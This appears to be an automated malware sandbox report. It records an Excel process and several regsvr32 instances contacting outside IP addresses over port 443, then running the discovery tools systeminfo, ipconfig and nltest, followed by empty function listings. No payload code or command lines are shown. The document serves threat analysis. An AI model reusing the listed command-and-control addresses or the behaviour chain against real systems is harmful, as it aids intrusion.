2022-07-01 09:37:55 UTC | 541 | IN | |
2022-07-01 09:37:55 UTC | 556 | IN | |
2022-07-01 09:37:55 UTC | 572 | IN | |
2022-07-01 09:37:55 UTC | 588 | IN | |
2022-07-01 09:37:55 UTC | 604 | IN | |
2022-07-01 09:37:55 UTC | 620 | IN | |
2022-07-01 09:37:55 UTC | 636 | IN | |
2022-07-01 09:37:55 UTC | 652 | IN | |
2022-07-01 09:37:55 UTC | 668 | IN | |
2022-07-01 09:37:55 UTC | 684 | IN | |
2022-07-01 09:37:55 UTC | 700 | IN | |
2022-07-01 09:37:55 UTC | 716 | IN | |
2022-07-01 09:37:55 UTC | 732 | IN | |
2022-07-01 09:37:55 UTC | 748 | IN | |
2022-07-01 09:37:55 UTC | 764 | IN | |
2022-07-01 09:37:55 UTC | 780 | IN | |
2022-07-01 09:37:55 UTC | 796 | IN | |
2022-07-01 09:37:55 UTC | 812 | IN | |
2022-07-01 09:37:55 UTC | 828 | IN | |
2022-07-01 09:37:55 UTC | 844 | IN | |
2022-07-01 09:37:55 UTC | 860 | IN | |
2022-07-01 09:37:55 UTC | 876 | IN | |
2022-07-01 09:37:55 UTC | 892 | IN | |
2022-07-01 09:37:55 UTC | 892 | IN | |
2022-07-01 09:37:55 UTC | 908 | IN | |
2022-07-01 09:37:55 UTC | 924 | IN | |
2022-07-01 09:37:55 UTC | 940 | IN | |
2022-07-01 09:37:55 UTC | 956 | IN | |
2022-07-01 09:37:55 UTC | 972 | IN | |
2022-07-01 09:37:55 UTC | 988 | IN | |
2022-07-01 09:37:55 UTC | 1004 | IN | |
2022-07-01 09:37:55 UTC | 1020 | IN | |
2022-07-01 09:37:55 UTC | 1036 | IN | |
2022-07-01 09:37:55 UTC | 1052 | IN | |
2022-07-01 09:37:55 UTC | 1068 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49173 | 185.165.46.170 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-01 09:37:58 UTC | 1079 | OUT | |
2022-07-01 09:37:58 UTC | 1080 | IN | |
2022-07-01 09:37:58 UTC | 1080 | IN | |
2022-07-01 09:37:58 UTC | 1081 | IN | |
2022-07-01 09:37:58 UTC | 1096 | IN | |
2022-07-01 09:37:58 UTC | 1112 | IN | |
2022-07-01 09:37:58 UTC | 1128 | IN | |
2022-07-01 09:37:58 UTC | 1144 | IN | |
2022-07-01 09:37:58 UTC | 1160 | IN | |
2022-07-01 09:37:58 UTC | 1176 | IN | |
2022-07-01 09:37:58 UTC | 1192 | IN | |
2022-07-01 09:37:58 UTC | 1208 | IN | |
2022-07-01 09:37:58 UTC | 1224 | IN | |
2022-07-01 09:37:58 UTC | 1240 | IN | |
2022-07-01 09:37:58 UTC | 1256 | IN | |
2022-07-01 09:37:59 UTC | 1272 | IN | |
2022-07-01 09:37:59 UTC | 1288 | IN | |
2022-07-01 09:37:59 UTC | 1304 | IN | |
2022-07-01 09:37:59 UTC | 1320 | IN | |
2022-07-01 09:37:59 UTC | 1336 | IN | |
2022-07-01 09:37:59 UTC | 1352 | IN | |
2022-07-01 09:37:59 UTC | 1368 | IN | |
2022-07-01 09:37:59 UTC | 1384 | IN | |
2022-07-01 09:37:59 UTC | 1400 | IN | |
2022-07-01 09:37:59 UTC | 1416 | IN | |
2022-07-01 09:37:59 UTC | 1432 | IN | |
2022-07-01 09:37:59 UTC | 1448 | IN | |
2022-07-01 09:37:59 UTC | 1464 | IN | |
2022-07-01 09:37:59 UTC | 1480 | IN | |
2022-07-01 09:37:59 UTC | 1496 | IN | |
2022-07-01 09:37:59 UTC | 1512 | IN | |
2022-07-01 09:37:59 UTC | 1528 | IN | |
2022-07-01 09:37:59 UTC | 1528 | IN | |
2022-07-01 09:37:59 UTC | 1544 | IN | |
2022-07-01 09:37:59 UTC | 1560 | IN | |
2022-07-01 09:37:59 UTC | 1576 | IN | |
2022-07-01 09:37:59 UTC | 1592 | IN | |
2022-07-01 09:37:59 UTC | 1608 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.22 | 49174 | 118.98.72.14 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-01 09:38:04 UTC | 1619 | OUT | |
2022-07-01 09:38:05 UTC | 1620 | IN | |
2022-07-01 09:38:05 UTC | 1620 | IN | |
2022-07-01 09:38:05 UTC | 1628 | IN | |
2022-07-01 09:38:05 UTC | 1636 | IN | |
2022-07-01 09:38:05 UTC | 1644 | IN | |
2022-07-01 09:38:05 UTC | 1652 | IN | |
2022-07-01 09:38:05 UTC | 1659 | IN | |
2022-07-01 09:38:05 UTC | 1667 | IN | |
2022-07-01 09:38:05 UTC | 1675 | IN | |
2022-07-01 09:38:06 UTC | 1683 | IN | |
2022-07-01 09:38:06 UTC | 1691 | IN | |
2022-07-01 09:38:06 UTC | 1698 | IN | |
2022-07-01 09:38:06 UTC | 1706 | IN | |
2022-07-01 09:38:06 UTC | 1714 | IN | |
2022-07-01 09:38:06 UTC | 1722 | IN | |
2022-07-01 09:38:06 UTC | 1730 | IN | |
2022-07-01 09:38:06 UTC | 1737 | IN | |
2022-07-01 09:38:06 UTC | 1745 | IN | |
2022-07-01 09:38:06 UTC | 1753 | IN | |
2022-07-01 09:38:06 UTC | 1761 | IN | |
2022-07-01 09:38:06 UTC | 1769 | IN | |
2022-07-01 09:38:06 UTC | 1777 | IN | |
2022-07-01 09:38:06 UTC | 1784 | IN | |
2022-07-01 09:38:06 UTC | 1792 | IN | |
2022-07-01 09:38:06 UTC | 1800 | IN | |
2022-07-01 09:38:06 UTC | 1808 | IN | |
2022-07-01 09:38:06 UTC | 1816 | IN | |
2022-07-01 09:38:06 UTC | 1823 | IN | |
2022-07-01 09:38:06 UTC | 1831 | IN | |
2022-07-01 09:38:06 UTC | 1839 | IN | |
2022-07-01 09:38:06 UTC | 1847 | IN | |
2022-07-01 09:38:06 UTC | 1855 | IN | |
2022-07-01 09:38:06 UTC | 1862 | IN | |
2022-07-01 09:38:06 UTC | 1870 | IN | |
2022-07-01 09:38:06 UTC | 1878 | IN | |
2022-07-01 09:38:06 UTC | 1886 | IN | |
2022-07-01 09:38:06 UTC | 1894 | IN | |
2022-07-01 09:38:06 UTC | 1902 | IN | |
2022-07-01 09:38:06 UTC | 1909 | IN | |
2022-07-01 09:38:06 UTC | 1917 | IN | |
2022-07-01 09:38:06 UTC | 1925 | IN | |
2022-07-01 09:38:06 UTC | 1933 | IN | |
2022-07-01 09:38:06 UTC | 1941 | IN | |
2022-07-01 09:38:06 UTC | 1948 | IN | |
2022-07-01 09:38:06 UTC | 1956 | IN | |
2022-07-01 09:38:06 UTC | 1964 | IN | |
2022-07-01 09:38:06 UTC | 1972 | IN | |
2022-07-01 09:38:06 UTC | 1980 | IN | |
2022-07-01 09:38:06 UTC | 1987 | IN | |
2022-07-01 09:38:06 UTC | 1995 | IN | |
2022-07-01 09:38:06 UTC | 2003 | IN | |
2022-07-01 09:38:06 UTC | 2011 | IN | |
2022-07-01 09:38:06 UTC | 2019 | IN | |
2022-07-01 09:38:06 UTC | 2027 | IN | |
2022-07-01 09:38:06 UTC | 2034 | IN | |
2022-07-01 09:38:06 UTC | 2042 | IN | |
2022-07-01 09:38:06 UTC | 2050 | IN | |
2022-07-01 09:38:06 UTC | 2058 | IN | |
2022-07-01 09:38:06 UTC | 2066 | IN | |
2022-07-01 09:38:06 UTC | 2073 | IN | |
2022-07-01 09:38:06 UTC | 2081 | IN | |
2022-07-01 09:38:06 UTC | 2089 | IN | |
2022-07-01 09:38:06 UTC | 2097 | IN | |
2022-07-01 09:38:06 UTC | 2105 | IN | |
2022-07-01 09:38:06 UTC | 2112 | IN | |
2022-07-01 09:38:06 UTC | 2120 | IN | |
2022-07-01 09:38:06 UTC | 2128 | IN | |
2022-07-01 09:38:06 UTC | 2136 | IN | |
2022-07-01 09:38:06 UTC | 2144 | IN | |
2022-07-01 09:38:06 UTC | 2152 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.22 | 49181 | 180.250.21.2 | 443 | C:\Windows\System32\regsvr32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-01 09:38:37 UTC | 2159 | OUT | |
2022-07-01 09:38:37 UTC | 2159 | OUT | |
2022-07-01 09:38:38 UTC | 2168 | IN | |
2022-07-01 09:38:38 UTC | 2169 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
5 | 192.168.2.22 | 49182 | 180.250.21.2 | 443 | C:\Windows\System32\regsvr32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-07-01 09:38:37 UTC | 2164 | OUT | |
2022-07-01 09:38:37 UTC | 2164 | OUT | |
2022-07-01 09:38:38 UTC | 2170 | IN | |
2022-07-01 09:38:38 UTC | 2170 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 11:38:10 |
Start date: | 01/07/2022 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f280000 |
File size: | 28253536 bytes |
MD5 hash: | D53B85E21886D2AF9815C377537BCAC3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Target ID: | 3 |
Start time: | 11:38:18 |
Start date: | 01/07/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xfff60000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Target ID: | 4 |
Start time: | 11:38:20 |
Start date: | 01/07/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xfff60000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Target ID: | 5 |
Start time: | 11:38:21 |
Start date: | 01/07/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xfff60000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Target ID: | 6 |
Start time: | 11:38:24 |
Start date: | 01/07/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xfff60000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Target ID: | 7 |
Start time: | 11:38:26 |
Start date: | 01/07/2022 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff7d0000 |
File size: | 27136 bytes |
MD5 hash: | C78655BC80301D76ED4FEF1C1EA40A7D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 8 |
Start time: | 11:38:26 |
Start date: | 01/07/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xfff60000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Target ID: | 9 |
Start time: | 11:38:29 |
Start date: | 01/07/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xfff60000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Target ID: | 10 |
Start time: | 11:38:32 |
Start date: | 01/07/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xfff60000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Target ID: | 11 |
Start time: | 11:38:34 |
Start date: | 01/07/2022 |
Path: | C:\Windows\System32\regsvr32.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xfff60000 |
File size: | 19456 bytes |
MD5 hash: | 59BCE9F07985F8A4204F4D6554CFF708 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Target ID: | 13 |
Start time: | 11:38:54 |
Start date: | 01/07/2022 |
Path: | C:\Windows\System32\systeminfo.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff1d0000 |
File size: | 110592 bytes |
MD5 hash: | DEBEA7D13C96687CAB4248DE0B6A2CE8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 15 |
Start time: | 11:38:55 |
Start date: | 01/07/2022 |
Path: | C:\Windows\System32\systeminfo.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff1d0000 |
File size: | 110592 bytes |
MD5 hash: | DEBEA7D13C96687CAB4248DE0B6A2CE8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 18 |
Start time: | 11:38:58 |
Start date: | 01/07/2022 |
Path: | C:\Windows\System32\ipconfig.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff840000 |
File size: | 58368 bytes |
MD5 hash: | CF45949CDBB39C953331CDCB9CEC20F8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 19 |
Start time: | 11:38:58 |
Start date: | 01/07/2022 |
Path: | C:\Windows\System32\ipconfig.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xff840000 |
File size: | 58368 bytes |
MD5 hash: | CF45949CDBB39C953331CDCB9CEC20F8 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 22 |
Start time: | 11:39:00 |
Start date: | 01/07/2022 |
Path: | C:\Windows\System32\nltest.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffd10000 |
File size: | 395776 bytes |
MD5 hash: | B23E4D796A3FEB91241A806EC18D5C32 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Target ID: | 23 |
Start time: | 11:39:00 |
Start date: | 01/07/2022 |
Path: | C:\Windows\System32\nltest.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xffd10000 |
File size: | 395776 bytes |
MD5 hash: | B23E4D796A3FEB91241A806EC18D5C32 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Execution Graph
Execution Coverage: | 11% |
Dynamic/Decrypted Code Coverage: | 4.5% |
Signature Coverage: | 15.9% |
Total number of Nodes: | 1596 |
Total number of Limit Nodes: | 17 |
Graph
Function 00000001800016A8 Relevance: 137.4, APIs: 9, Strings: 69, Instructions: 913memorycomCOMMONLIBRARYCODECrypto
Control-flow Graph
C-Code - Quality: 20% |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 00140000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02145B18 Relevance: 5.7, Strings: 4, Instructions: 709COMMON
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0214CCC8 Relevance: 5.3, Strings: 4, Instructions: 291COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02158B3C Relevance: 4.1, Strings: 3, Instructions: 372COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0215EB08 Relevance: 3.9, Strings: 3, Instructions: 143COMMON
Control-flow Graph
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02157414 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130processCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02151B88 Relevance: 1.8, Strings: 1, Instructions: 586COMMON
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0215BD64 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Control-flow Graph
APIs |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0215A804 Relevance: 1.5, Strings: 1, Instructions: 205COMMON
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0216B6BC Relevance: 1.4, Strings: 1, Instructions: 144COMMON
Control-flow Graph
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02167E28 Relevance: .2, Instructions: 171COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0000000180003578 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
Control-flow Graph
C-Code - Quality: 93% |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 000000018000768C Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
Control-flow Graph
C-Code - Quality: 16% |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02147CAC Relevance: 34.7, Strings: 27, Instructions: 967COMMON
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02146698 Relevance: 15.7, Strings: 12, Instructions: 698COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02141368 Relevance: 13.4, Strings: 10, Instructions: 886COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0215484C Relevance: 10.9, Strings: 8, Instructions: 912COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0216A304 Relevance: 7.1, Strings: 5, Instructions: 835COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 021599F4 Relevance: 6.3, Strings: 5, Instructions: 82COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02164EF4 Relevance: 5.6, Strings: 4, Instructions: 649COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0215C9F0 Relevance: 5.5, Strings: 4, Instructions: 482COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02168B28 Relevance: 5.2, Strings: 4, Instructions: 164COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0214B3E4 Relevance: 5.2, Strings: 4, Instructions: 152COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02153724 Relevance: 5.1, Strings: 4, Instructions: 144COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02142DC0 Relevance: 5.1, Strings: 4, Instructions: 116COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02142AE4 Relevance: 5.1, Strings: 4, Instructions: 99COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02143A9C Relevance: 5.1, Strings: 4, Instructions: 88COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0215B558 Relevance: 5.1, Strings: 4, Instructions: 79COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 021613FC Relevance: 5.1, Strings: 4, Instructions: 77COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 021514A0 Relevance: 5.1, Strings: 4, Instructions: 72COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0214AFE4 Relevance: 5.1, Strings: 4, Instructions: 66COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 021493AC Relevance: 4.9, Strings: 3, Instructions: 1168COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 021472E0 Relevance: 4.3, Strings: 3, Instructions: 582COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0215FC70 Relevance: 4.3, Strings: 3, Instructions: 537COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0214E254 Relevance: 4.2, Strings: 3, Instructions: 456COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 021441A8 Relevance: 4.2, Strings: 3, Instructions: 417COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02157144 Relevance: 3.9, Strings: 3, Instructions: 189COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02142820 Relevance: 3.9, Strings: 3, Instructions: 179COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0215EFAC Relevance: 3.8, Strings: 3, Instructions: 99COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0215C5AC Relevance: 3.8, Strings: 3, Instructions: 95COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0215C720 Relevance: 3.8, Strings: 3, Instructions: 91COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02152F94 Relevance: 3.8, Strings: 3, Instructions: 89COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02163DD4 Relevance: 3.8, Strings: 3, Instructions: 89COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0214CB6C Relevance: 3.8, Strings: 3, Instructions: 88COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0216B570 Relevance: 3.8, Strings: 3, Instructions: 76COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02150B60 Relevance: 3.8, Strings: 3, Instructions: 65COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02165E30 Relevance: 3.8, Strings: 3, Instructions: 52COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0214FE58 Relevance: 2.9, Strings: 2, Instructions: 351COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02163894 Relevance: 2.8, Strings: 2, Instructions: 330COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02150C68 Relevance: 2.8, Strings: 2, Instructions: 325COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0214C458 Relevance: 2.8, Strings: 2, Instructions: 309COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02153210 Relevance: 2.7, Strings: 2, Instructions: 245COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 021436E0 Relevance: 2.7, Strings: 2, Instructions: 221COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0215A408 Relevance: 2.7, Strings: 2, Instructions: 195COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 021490D4 Relevance: 2.7, Strings: 2, Instructions: 157COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0214D300 Relevance: 2.6, Strings: 2, Instructions: 150COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02141014 Relevance: 2.6, Strings: 2, Instructions: 148COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 02144C64 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
Strings |
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Yara matches |
Similarity |
|
Uniqueness |
Uniqueness Score: -1.00% |
Function 0214B0F8 Relevance: 2.6, Strings: 2, Instructions: 115COMMON
